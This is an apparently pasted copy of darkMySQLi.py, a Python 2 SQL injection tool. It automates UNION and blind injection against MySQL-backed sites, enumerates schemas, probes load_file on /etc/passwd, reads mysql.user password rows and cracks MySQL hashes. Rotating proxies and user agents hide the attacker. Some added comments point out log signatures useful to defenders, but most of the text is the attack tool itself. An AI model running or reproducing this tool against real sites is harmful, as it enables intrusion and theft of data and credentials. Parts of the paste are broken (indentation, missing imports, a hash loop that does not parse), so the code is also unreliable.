Googleinurl

[SCRIPT]=> darkMySQLi.py Multi Purpose MySQL Injection Tool

  1. #!/usr/bin/python
  2. #     1/30/09
  3. ################################################################
  4. #       .___             __          _______       .___        #
  5. #     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
  6. #    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
  7. #   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
  8. #   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
  9. #        \/                  \/             \/                 #
  10. #                   ___________   ______  _  __                #
  11. #                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
  12. #                 \  \___|  | \/\  ___/\     /                 #
  13. #                  \___  >__|    \___  >\/\_/                  #
  14. #      est.2007        \/            \/   forum.darkc0de.com   #
  15. ################################################################
  16. # Multi-Purpose MySQL Injection Tool
  17. # FUNCTIONS
  18. #  *union injection
  19. #  *blind injection
  20. #  *post and get method injection ** POST not working yet
  21. #  *full information_schema enumeration
  22. #  *table and column fuzzer
  23. #  *database information extractor
  24. #  *column length finder
  25. #  *load_file fuzzer
  26. #  *general info gathering
  27. #  *MySQL hash cracker
  28. # FEATURES
  29. #  *Round Robin Proxy w/ a proxy list (non-auth or auth proxies)
  30. #  *Proxy Auth (works great with Squid w/ basic auth)
  31. #  *Random browser agent chosen everytime the script runs
  32. #  *debug mode for seeing every URL request, proxy used, browser agent used (chosen anew every time the script runs)
  33.  
  34. # Share the c0de! (f*ck Windows! Get a real OS!)
  35.  
  36. # darkc0de Crew
  37. # www.darkc0de.com
  38. # rsauron[at]gmail[dot]com
  39.  
  40. # Greetz to
  41. # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen
  42. # and the darkc0de crew
  43.  
  44. # This was written for educational purpose only. Use it at your own risk.
  45. # Author will be not responsible for any damage!
  46. # Intended for authorized Web Application Pen Testing!
  47.  
  48. # CHANGES
  49. # 1.6 ADDED --end evasion setting
  50. # 1.5 Fixed --start now starts at correct number instead of +1
  51. # 1.4 Fixed schema mode when a table was specified - app would hang after last column
  52. # 1.3 Fixed Regular Expression Search in dump mode (should fix issues of crazy html code when dumping)
  53. # 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string
  54.  
  55. # BE WARNED, THIS TOOL IS VERY LOUD..
  56.  
  57. import urllib, sys, re, os, socket, httplib, urllib2, time, random
  58.  
## Evasion defaults. arg_end terminates the injected statement and arg_eva is
## the whitespace substitute swapped in for every "+" by GetThatShit; both are
## replaced when --end is given on the command line.
arg_end = "--"  # examples "--", "/*", "#", "%00", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point
arg_eva = "+"   # examples "/**/" ,"+", "%20"
## Exclusive upper bound of the --findcol column counter (xrange(1, colMax))
colMax = 200
## Process-wide socket timeout, in seconds, for every request the script makes
socket.setdefaulttimeout(10)
## Log file appended to for the whole run; --output overrides the name
logfile = "darkMySQLi.log"
## Wordlists consumed by the table / column / LOAD_FILE fuzzers (those modes are
## not part of this excerpt)
tablefuzz = "tablesfuzz.txt"
columnfuzz = "columnsfuzz.txt"
loadfilefuzz = "loadfilefuzz.txt"
## User-Agent pool; a single entry is picked at random once per run
## (agent = random.choice(agents)) and then sent on every request
agents = [
    "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
    "Microsoft Internet Explorer/4.0b1 (Windows 95)",
    "Opera/8.00 (Windows NT 5.1; U; en)",
]
  79.  
#URL Get Function - the single chokepoint every request of this script passes through
def GetThatShit(head_URL):
        """Fetch head_URL through the next opener of the round-robin proxy list.

        Request shaping all happens here: every "+" in the URL is rewritten to
        arg_eva, the per-run User-Agent (module global ``agent``) is attached,
        and the counters ``gets`` (total requests issued) and ``proxy_num``
        (opener selector) are bumped once per attempt.

        Returns the raw response body. On urllib2.HTTPError the loop is left and
        "" is returned (despite the "Trying again!" message there is no retry);
        any other exception is printed together with the proxy/agent/URL and
        re-raised.
        """
        global gets;global proxy_num
        head_URL = head_URL.replace("+",arg_eva)
        request_web = urllib2.Request(head_URL)
        request_web.add_header('User-Agent',agent)
        body = ""
        # An empty body is not accepted; the same request is re-issued through
        # the next opener in the list until something comes back.
        while not body:
                if arg_debug == "on":
                        print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                gets+=1;proxy_num+=1
                try:
                        body = proxy_list[proxy_num % proxy_len].open(request_web).read()
                except (KeyboardInterrupt, SystemExit):
                        raise
                except urllib2.HTTPError:
                        print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!"
                        print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                        break
                except:
                        print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!"
                        print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                        raise
        return body
  104.  
  105. #the guts and glory - Binary Algorithm that does all the guessing for the Blind Methodology
def GuessValue(URL):
        """Binary-search the integer produced by the expression at the end of URL.

        The caller passes a URL whose injected tail evaluates to a number; this
        routine appends ">mid" (and finally "=lower") and asks GetThatShit
        whether arg_string, the truth-marker regex, appears in the response.
        Every bisection step is one HTTP request, so one value costs roughly
        log2(upper_bound - lower_bound) requests; on the server side that shows
        up as a burst of near-identical URLs differing only in the trailing
        number, which is the pattern a WAF or log review would key on.

        Reads module globals lower_bound, upper_bound and arg_string.
        Returns the value found; calls sys.exit(1) if the final "=" probe does
        not confirm it.
        """
        lower = lower_bound;upper = upper_bound
        while lower < upper:
                try:
                        mid = (lower + upper) / 2
                        head_URL = URL + ">"+str(mid)
                        source = GetThatShit(head_URL)
                        match = re.findall(arg_string,source)
                        # marker present == "value > mid" is true, so move the floor up
                        if len(match) >= 1:
                                lower = mid + 1
                        else:
                                upper = mid
                except (KeyboardInterrupt, SystemExit):
                        raise
                except:
                        # Any transport or regex error is swallowed and the same
                        # step is repeated with unchanged bounds; a request that
                        # keeps failing therefore never advances the search.
                        pass

        # A result strictly inside the bounds is trusted as-is; hitting either
        # bound is suspicious and is confirmed with an exact-match probe first.
        if lower > lower_bound and lower < upper_bound:
                value = lower
        else:
                head_URL = URL + "="+str(lower)
                source = GetThatShit(head_URL)
                match = re.findall(arg_string,source)
                if len(match) >= 1:
                        value = lower
                else:
                        # 63 is ord("?"), a placeholder; unreachable for callers
                        # because of the sys.exit below.
                        value = 63
                        print "Could not find the ascii character! There must be a problem.."
                        print "Check to make sure your using the my script right!"
                        print "READ xprog's blind sql tutorial!\n"
                        sys.exit(1)
        return value
  138.  
  139. ## Functions for MySQL5 hash cracking --- THANKS d3hydr8
def c1(word):
    """Return hex(SHA1(SHA1(word[:-1]))), the MySQL 4.1+/5 PASSWORD() digest.

    word is one raw wordlist line; the slice drops its trailing newline (and
    the last character of a final line that has none). Output is lowercase
    hex, so comparisons against it are case-sensitive. c2 is the same routine
    for interpreters without hashlib.
    """
    inner = hashlib.sha1(word[:-1]).digest()
    return hashlib.sha1(inner).hexdigest()
  146.  
def c2(word):
    """Legacy twin of c1: hex(SHA1(SHA1(word[:-1]))) via the old ``sha`` module.

    Used only when the --crack branch fails to import hashlib; the ``sha``
    module itself is imported there, not at file top.
    """
    outer = sha.new()
    outer.update(sha.new(word[:-1]).digest())
    return outer.hexdigest()
  153.  
  154. ## Function for MySQL323 hash cracking
def mysql323(clear):
    """Compute the 16-hex-digit pre-4.1 MySQL password hash of clear.

    Port of the old MySQL hash_password() routine: spaces and tabs are
    skipped, two accumulators are mixed per character, and the low 31 bits
    of each are emitted as eight hex digits. Unlike c1 the caller strips
    the newline before calling this.
    NOTE(review): in this paste the body of the ``for c in clear:`` loop
    (``if c == ' '`` through ``add += tmp``) is not indented one level
    deeper than the ``for``, so the function as shown does not parse;
    presumably tabs were lost when the file was pasted. ``retval`` is unused.
    """
    # Taken almost verbatim from mysql's source
    nr = 1345345333
    add = 7
    nr2 = 0x12345671
    retval = ""
    for c in clear:
    if c == ' ' or c == '\t':
        continue
    tmp = ord(c)
    nr ^= (((nr & 63) + add) * tmp) + (nr << 8)
    nr2 += (nr2 << 8) ^ nr
    add += tmp
    # Only the low 31 bits of each accumulator survive; the unbounded Python
    # ints above do not change those bits because xor/add/mul/shift-left are
    # all closed on the low bits.
    res1 = nr & ((1 << 31) - 1)
    res2 = nr2 & ((1 << 31) - 1)
    return "%08lx%08lx" % (res1, res2)
  171.    
#say hello - no arguments at all: show the banner and stop
if len(sys.argv) <= 1:
        banner = (
                "\n|--------------------------------------------------|",
                "| rsauron@gmail.com                         v1.6   |",
                "|   1/2009      darkMySQLi.py                      |",
                "|     -- Multi Purpose MySQL Injection Tool --     |",
                "| Usage: darkMySQLi.py [options]                   |",
                "|                      -h help       darkc0de.com  |",
                "|--------------------------------------------------|\n",
        )
        print "\n".join(banner)
        sys.exit(1)
  182.  
#help option - -h/--help anywhere on the command line prints usage and exits
if "-h" in sys.argv or "--help" in sys.argv:
        usage = (
                "\n       darkMySQLi v1.6                         rsauron@gmail.com",
                "                                              forum.darkc0de.com",
                "Usage: ./darkMySQLi.py [options]",
                "Options:",
                "  -h, --help           shows this help message and exits",
                "  -d, --debug          display URL debug information\n",
                "  Target:",
                "    -u URL, --url=URL  Target url\n",
                "  Methodology:",
                "    -b, --blind        Use blind methodology (req: --string)",
                "    -s, --string       String to match in page when the query is valid",
                "  Method:",
                "    --method=PUT       Select to use PUT method ** NOT WORKING",
                "  Modes:",
                "    --dbs              Enumerate databases           MySQL v5+",
                "    --schema           Enumerate Information_schema (req: -D,",
                "                       opt: -T)                      MySQL v5+",
                "    --full             Enumerate all we can          MySQL v5+",
                "    --info             MySQL Server configuration    MySQL v4+",
                "    --fuzz             Fuzz Tables & Columns Names   MySQL v4+",
                "    --findcol          Find Column length            MySQL v4+",
                "    --dump             Dump database table entries  (req: -T,",
                "                       opt: -D, -C, --start)         MySQL v4+",
                "    --crack=HASH       Crack MySQL Hashs (req: --wordlist)",
                "    --wordlist=LIS.TXT Wordlist to be used for cracking",
                "  Define:",
                "    -D DB              database to enumerate",
                "    -T TBL             database table to enumerate",
                "    -C COL             database table column to enumerate",
                "  Optional:",
                "    --ssl              To use SSL",
                "    --end              To use   +  and -- for the URLS --end \"--\" (Default)",
                "                       To use /**/ and /* for the URLS --end \"/*\"",
                "    --rowdisp          Do not display row # when dumping",
                "    --start=ROW        Row number to begin dumping at",
                "    --where=COL,VALUE  Use a where clause in your dump",
                "    --orderby=COL      Use a orderby clause in your dump",
                "    --cookie=FILE.TXT  Use a Mozilla cookie file",
                "    --proxy=PROXY      Use a HTTP proxy to connect to the target url",
                "    --output=FILE.TXT  Output results of tool to this file\n",
        )
        print "\n".join(usage)
        sys.exit(1)
  227.  
#define variables
# Target / transport settings. The string "None" (not the object None) is the
# "unset" sentinel used throughout this script.
site = ""
proxy = "None"
arg_cookie = "None"
arg_ssl = "off"
arg_proxy_auth = ""
arg_debug = "off"
# Mode selection; arg_blind becomes "--blind" when that flag is parsed
mode = "None"
arg_blind = "--union"
arg_string = ""
# Scope (-D/-T/-C) and dump options
arg_database = "None"
arg_table = "None"
arg_columns = "None"
arg_insert = "None"
arg_where = ""
arg_orderby = ""
arg_row = "Rows"
arg_rowdisp = 1
arg_adminusers = 10
arg_wordlist = ""
# Prefix used when the "darkc0de" marker in the URL is swapped for a query;
# the name is reassigned inside the --findcol loop
darkc0de = "concat(0x1e,0x1e,"
# Search window handed to GuessValue
lower_bound = 0
upper_bound = 16069
# Working state
line_URL = ""
count_URL = ""
cur_db = ""
cur_table = ""
terminal = ""
agent = ""
version = []
count = gets = table_num = num = lim_num = 0
ser_ver = 3
let_pos = 1
  265.  
#Check args
# Hand-rolled parser: ``count`` tracks the index of ``arg`` so value-taking
# flags read sys.argv[count+1]. There is no bounds check, so a value flag given
# as the last argument raises IndexError. Flags of the form --crack=HASH shown
# in the help are NOT understood; the value must be the next argument.
# Mode flags also stash the flag string itself (arg_dump, arg_schema, ...);
# only ``mode`` is read afterwards.
# NOTE(review): indentation in this paste alternates between 4 and 8 spaces
# inside one if/elif chain - presumably tabs in the original file.
for arg in sys.argv:
    if arg == "-u" or arg == "--url":
        site = sys.argv[count+1]
    elif arg == "--output":
        logfile = sys.argv[count+1]
    elif arg == "--proxy":
        proxy = sys.argv[count+1]
        elif arg == "--proxyauth":
                arg_proxy_auth = sys.argv[count+1]
    elif arg == "--dump":
                mode = arg;arg_dump = sys.argv[count]
        elif arg == "--full":
                mode = arg
        elif arg == "--schema":
                mode = arg;arg_schema = sys.argv[count]
        elif arg == "--dbs":
                mode = arg;arg_dbs = sys.argv[count]
        elif arg == "--fuzz":
                mode = arg;arg_fuzz = sys.argv[count]
        elif arg == "--info":
                mode = arg;arg_info = sys.argv[count]
        elif arg == "--crack":
                mode = arg;arg_hash = sys.argv[count+1]
        elif arg == "--wordlist":
                arg_wordlist = sys.argv[count+1]
        elif arg == "--findcol":
                mode = arg;arg_findcol = sys.argv[count]
        elif arg == "--cookie":
                arg_cookie = sys.argv[count+1]
        elif arg == "--ssl":
                arg_ssl = "on"
        # arg_blind ends up holding the flag as typed; later checks compare it
        # to "--blind" only, so the short form "-b" does not switch methodology.
        elif arg == "-b" or arg == "--blind":
                arg_blind = arg;arg_blind = sys.argv[count]
    elif arg == "-s" or arg == "--string":
                arg_string = sys.argv[count+1]
    elif arg == "-D":
        arg_database = sys.argv[count+1]
    elif arg == "-T":
        arg_table = sys.argv[count+1]
    elif arg == "-C":
        arg_columns = sys.argv[count+1]
    # --start is 1-based on the command line, 0-based internally
    elif arg == "--start":
                num = int(sys.argv[count+1]) - 1
                table_num = num
        elif arg == "-d" or arg == "--debug":
                arg_debug = "on"
        elif arg == "--where":
                arg_where = sys.argv[count+1]
        elif arg == "--orderby":
                arg_orderby = sys.argv[count+1]
        elif arg == "--rowdisp":
                arg_rowdisp = sys.argv[count]
                arg_rowdisp = 0
    # --end chooses both the statement terminator and the whitespace substitute
    elif arg == "--end":
                arg_end = sys.argv[count+1]
                if arg_end == "--":
                        arg_eva = "+"
                else:
                        arg_eva = "/**/"
    count+=1
  327.  
#Title write
# The log is opened once in append mode and stays open for the whole run.
# Note that the name ``file`` shadows the builtin from here on.
file = open(logfile, "a")
title = (
        "\n|--------------------------------------------------|",
        "| rsauron@gmail.com                         v1.6   |",
        "|   1/2009      darkMySQLi.py                      |",
        "|     -- Multi Purpose MySQL Injection Tool --     |",
        "| Usage: darkMySQLi.py [options]                   |",
        "|                      -h help       darkc0de.com  |",
        "|--------------------------------------------------|\n",
)
print "\n".join(title)
  337.  
#Arg Error Checking
# Required-argument checks; every failure exits with status 1 after a hint.
if mode != "--crack" and site == "":
        print "[-] URL is required!\n[-] Need Help? --help\n"
        sys.exit(1)
if mode == "None":
        print "[-] Mode is required!\n[-] Need Help? --help\n"
        sys.exit(1)
if mode == "--schema" and arg_database == "None":
        print "[-] Must include -D flag!\n[-] Need Help? --help\n"
        sys.exit(1)
if mode == "--dump":
        if arg_table == "None" or arg_columns == "None":
                print "[-] Must include -T and -C flag. -D is Optional\n[-] Need Help? --help\n"
                sys.exit(1)
# --proxy takes either "host:port" or a file name; a value with exactly one
# dot is assumed to be a file (so "proxies.txt" works but "10.0.0.1:8080"
# is used directly). Either way ``proxy`` becomes a list of lines.
if proxy != "None":
        if len(proxy.split(".")) == 2:
                proxy = open(proxy, "r").read()
        if proxy.endswith("\n"):
                proxy = proxy.rstrip("\n")
        proxy = proxy.split("\n")
if arg_ssl == "off":
        if site[:4] != "http":
                site = "http://"+site
else:
        if site[:5] != "https":
                site = "https://"+site
# rstrip() removes any trailing run of the given characters, not the two-char
# suffix, so "/*" also eats a preceding "/" and "--" eats any extra dashes.
if site.endswith("/*"):
    site = site.rstrip('/*')
if site.endswith("--"):
    site = site.rstrip('--')
# NOTE(review): cookielib is not in the import line at the top of this file;
# unless it is imported elsewhere, the NameError is caught by the bare except
# below and reported as a malformed cookie file.
if arg_cookie != "None":
        try:
                cj = cookielib.MozillaCookieJar()
                cj.load(arg_cookie)
                cookie_handler = urllib2.HTTPCookieProcessor(cj)
        except:
                print "[!] There was a problem loading your cookie file!"
                print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
                print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
                sys.exit(1)
else:
        cookie_handler = urllib2.HTTPCookieProcessor()
# Union modes need the literal marker "darkc0de" in the URL; it is replaced by
# the generated expression for each request.
if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1:
    print "[-] Site must contain \'darkc0de\'\n"
    sys.exit(1)
if arg_blind == "--blind" and arg_string == "":
        print "[-] You must specify a --string when using blind methodology.\n"
        sys.exit(1)
if arg_columns != "None":
        arg_columns = arg_columns.split(",")
# arg_insert is never set by the argument parser above, so this stays "None"
if arg_insert != "None":
        arg_insert = arg_insert.split(",")
if mode == "--crack" and arg_wordlist == "":
        print "[-] You must specify a --wordlist to crack with.\n"
        sys.exit(1)
# One User-Agent per run; it is echoed in the log and sent on every request
agent = random.choice(agents)
  394.  
# Same banner as printed to the terminal, appended to the log; each line is
# prefixed with "\n" so the entry never continues a previous line.
for banner_line in (
        "|--------------------------------------------------|",
        "| rsauron@gmail.com                         v1.6   |",
        "|   1/2009      darkMySQLi.py                      |",
        "|     -- Multi Purpose MySQL Injection Tool --     |",
        "| Usage: darkMySQLi.py [options]                   |",
        "|                      -h help       darkc0de.com  |",
        "|--------------------------------------------------|",
):
        file.write("\n" + banner_line)
  402.        
## MySQL Hash cracking
# Offline mode: no URL needed. The hash length selects the algorithm
# (40 hex chars -> c1/c2 double-SHA1, 16 -> mysql323). The whole wordlist is
# read into memory and the file handle is never closed. Comparison is a plain
# string ==, i.e. case-sensitive against the lowercase hexdigest() output.
if mode == "--crack":
        try:
                arg_wordlist = open(arg_wordlist, "r")
        except(IOError):
                print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n")
                sys.exit(1)
        if len(arg_hash) != 40 and len(arg_hash) != 16:
                print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n")
                sys.exit(1)
        arg_wordlist = arg_wordlist.readlines()
        print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist)))
        if len(arg_hash) == 40:
                print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash)
                # hashlib first; fall back to the legacy sha module on old
                # interpreters. c1/c2 strip the line's trailing newline themselves,
                # so ``word`` is passed raw here (and printed with its newline).
                try:
                        import hashlib
                        for word in arg_wordlist:
                                if arg_hash == c1(word):
                                        print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
                                        break
                except(ImportError):
                        import sha
                        for word in arg_wordlist:
                                if arg_hash == c2(word):
                                        print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
                                        break
        else:
                print "[+] Detected MySQL v4 Hash:",arg_hash
                print "[+] Try darkc0de hash database @ "
                # mysql323 expects the newline already stripped, unlike c1/c2
                for word in arg_wordlist:
                        word = word.rstrip("\n")
                        if arg_hash == mysql323(word):
                                print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n")
                                break
        # Exit status is 1 whether or not a match was found
        print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n")
        sys.exit(1)
  439.        
#General Info
# Run header: echo the effective settings to the terminal and to the log.
ssl_state = "No"
if site[:5] == "https":
        ssl_state = "Yes"
info_lines = [
        "[+] URL: " + site,
        "[+] %s" % time.strftime("%X"),
        "[+] Evasion: " + arg_eva + " " + arg_end,
        "[+] Cookie: " + arg_cookie,
        "[+] SSL: " + ssl_state,
        "[+] Agent: " + agent,
]
print "\n".join(info_lines)
file.write("\n\n" + "\n".join(info_lines))
  450.        
#Build proxy list
# One urllib2 opener per usable proxy; GetThatShit rotates through them.
# Every candidate is smoke-tested by fetching http://www.google.com through
# it, so the script contacts that third party once per configured proxy at
# start-up - worth knowing when reviewing egress logs of a host that ran it.
proxy_list = [];proxy_list_count = []
if proxy != "None":
    print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...")
    for p in proxy:
        try:
                        # three colons -> host:port:user:pass, parsed into arg_proxy_auth
                        match = re.findall(":",p)
                        if len(match) == 3:
                                arg_proxy_auth = []
                                prox = p.split(":")
                                arg_proxy_auth += prox
                        # NOTE(review): this branch installs only a basic-auth
                        # handler and no ProxyHandler, so it is not clear that the
                        # requests actually traverse the proxy; confirm before
                        # relying on it. arg_proxy_auth from --proxyauth is a str,
                        # and [2]/[3] would then be single characters.
                        if arg_proxy_auth != "":
                                proxy_auth_handler = urllib2.HTTPBasicAuthHandler()
                                proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3])
                                opener = urllib2.build_opener(proxy_auth_handler)
                                opener.open("http://www.google.com")
                                proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler))
                                proxy_list_count.append(p);arg_proxy_auth = ""
                        else:
                                proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
                                opener = urllib2.build_opener(proxy_handler)
                                opener.open("http://www.google.com")
                                proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
                                proxy_list_count.append(p)
                        if len(match) == 3 or len(match) == 1:
                                print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success")
                        else:
                                print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success")
        # Any failure (DNS, timeout, auth, ...) just drops this proxy from the list
        except:
            print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0]))
            pass
    if len(proxy_list) == 0:
        print "[-] All proxies have failed. App Exiting"
        sys.exit(1)
    print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete")
else:
    # No proxy: a single direct opener that still carries the cookie jar.
    # NOTE(review): the two lines below are indented differently in this paste.
    print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given")
    proxy_list.append(urllib2.build_opener(cookie_handler))
        proxy_list_count.append("None")
# Rotation state read and advanced by GetThatShit
proxy_num = 0
proxy_len = len(proxy_list)
  492.  
## Blind String checking!
# Calibrate the truth marker (--string) against an always-true condition: it
# should occur exactly once in the baseline page for GuessValue's bisection to
# be reliable. (The warning text says "more than 2 times" but fires at 2.)
if arg_blind == "--blind":
        print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!")
        head_URL = site+"+AND+1=1"
        source = GetThatShit(head_URL)
        match = re.findall(arg_string,source)
        hits = len(match)
        if hits >= 2:
                print "\n[-] The String you used has been found on the target page in-use more than 2 times"
                print "[-] This might lead to false positives with the blind methodology"
                print "[-] Might not mean anything.. I am just trying to help out.."
                print "[-] If you have problems you might know why.. ;-)\n"
        elif hits == 0:
                print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n"
                sys.exit(1)
        else:
                print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)")
  509.                
#Column Finder c0de
# Determine the column count of the injectable SELECT by appending one more
# hex-encoded marker per iteration and re-issuing the whole, growing UNION
# SELECT. Up to colMax-1 requests are sent, each with a query string strictly
# longer than the last - a very recognisable sequence in an access log.
# On success the marker numbers found in the page are swapped for the literal
# "darkc0de" placeholder and the ready-to-use URL is printed.
if mode == "--findcol":
        print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...")
        print "[+] Testing: ",
        file.write("\n[+] Testing: ",)
        checkfor=[];nullFound=[];nullnum=[];makepretty = ""
        sitenew = site+"+AND+1=2+UNION+SELECT+"
        for x in xrange(1,colMax):
                try:
                        sys.stdout.write("%s," % (x))
                        file.write(str(x)+",")
                        sys.stdout.flush()
                        # "darkNcode" markers; note this rebinds the module-level
                        # darkc0de variable for the rest of this mode
                        darkc0de = "dark"+str(x)+"code"
                        checkfor.append(darkc0de)
                        if x > 1:
                                sitenew += ","
                        sitenew += "0x"+darkc0de.encode("hex")
                        finalurl = sitenew+arg_end
                        source = GetThatShit(finalurl)
                        # any marker echoed back means the column count is right
                        # and that column is rendered on the page
                        for y in checkfor:
                                colFound = re.findall(y,source)
                                if len(colFound) != 0:
                                        nullFound.append(colFound[0])
                        if len(nullFound) >= 1:
                                print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor)))
                                print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",)
                                for z in nullFound:
                                        nullcol = re.findall(("\d+"),z)
                                        nullnum.append(nullcol[0])
                                        sys.stdout.write("%s," % (nullcol[0]))
                                        file.write(str(nullcol[0])+",")
                                        sys.stdout.flush()
                                # makepretty = "1,2,...,N"
                                for z in xrange(0,len(checkfor)):
                                        z+=1
                                        if z > 1:
                                                makepretty += ","
                                        makepretty += str(z)
                                site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end
                                print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site)
                                # The first pattern assumes "+" separators; with a
                                # different arg_eva only the ","-delimited forms match.
                                for z in nullnum:
                                        site = site.replace("+"+z+",","+darkc0de,")
                                        site = site.replace(","+z+",",",darkc0de,")
                                        site = site.replace(","+z+arg_end,",darkc0de"+arg_end)
                                print "[!] darkMySQLi URL:",site;file.write("\n[!] darkMySQLi URL: "+site)
                                print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
                                print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
                                print "[-] Done\n";file.write("\n[-] Done\n")
                                print "Don't forget to check", logfile,"\n"
                                file.close();sys.exit(1)
                except (KeyboardInterrupt, SystemExit):
                        raise
                # Every other error (including a re-raised one from GetThatShit)
                # is swallowed, so a dead target looks like "could not be found".
                except:
                        pass

        print "\n[!] Sorry Column Length could not be found."
        file.write("\n[!] Sorry Column Length could not be found.")
        print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!"
        print "[-] Done\n"
        sys.exit(1)
  569.  
#Retrieve version:user:database
# Union path: the values are wrapped in 0x1e record separators (doubled at the
# front) so they can be pulled out of arbitrary HTML with one regex; \S+ stops
# at whitespace, hence the trailing 0x20. That 0x1e0x1e framing is also the
# most distinctive signature this script leaves in a request/response log.
if arg_blind != "--blind":
        head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
        print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n")
        source = GetThatShit(head_URL)
        match = re.findall("\x1e\x1e\S+",source)
        if len(match) >= 1:
                # split yields ["", "", version, user, database, ...]; [0:] is a no-op
                match = match[0][0:].split("\x1e")
                version = match[2]
                user = match[3]
                database = match[4]
                print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n")
                print "\tUser:", user;file.write("\tUser: "+user+"\n")
                print "\tVersion:", version;file.write("\tVersion: "+version)
        else:
                print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n"
                sys.exit(1)
else:
        # Blind path: test the first character of @@version for 3, 4, 5, 6 in
        # turn (one request each). The check is an equality, so "MySQL >= vN"
        # in the message really means "major version is N". ``version`` is the
        # list [] here, so += appends the digit as a one-character element.
        print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...")
        while 1:
                config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
                source = GetThatShit(config_URL)
                match = re.findall(arg_string,source)
                if len(match) >= 1:
                        print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
                        version += str(ser_ver)
                        break
                if ser_ver == 6:
                        print "[-] Was unable to determine MySQL version.\n[-] Done"
                        sys.exit(1)
                ser_ver+=1
  601.                
#lets check what we can do based on version
# The three modes that read information_schema (which MySQL introduced in 5.0)
# are refused when the version string gathered above starts with "4".
if mode == "--schema" or mode == "--dbs" or mode == "--full":
        if version[0] == str(4):
                print "\n[-] Mode Selected is incompatible with MySQL v4 Servers"
                print "[-] -h for help"
                sys.exit(1)
  608.  
# Mode --info
# Union-mode information gathering. Every probe is judged solely by whether
# the fixed marker "darkc0de" (0x6461726b63306465 as a hex literal) is echoed
# back in the page:
#   1. SELECT the marker FROM mysql.user      -> can the DB account read
#      mysql.user?  If yes, host:user:password rows are read one LIMIT at a time.
#   2. load_file(0x2f6574632f706173737764)   -> hex spelling of '/etc/passwd';
#      does load_file() return anything at all?
#   3. load_file('%2Fetc%2Fpasswd')          -> same file via a quoted literal,
#      used as the magic_quotes heuristic.
# Detection note: the marker, the concat(0x1e,0x1e,...,0x1e,0x20) framing and
# the hex-encoded /etc/passwd never change between runs, so they are the kind
# of constant strings a WAF signature or access-log rule can match on.
# `site`, `arg_end`, `proxy`, `loadfilefuzz`, `GetThatShit` and the log handle
# `file` are defined above this chunk.
if mode == "--info" and arg_blind != "--blind":
        # Python 2 str.encode("hex") turns "darkc0de" into "6461726b63306465".
        head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end
        source = GetThatShit(head_URL)
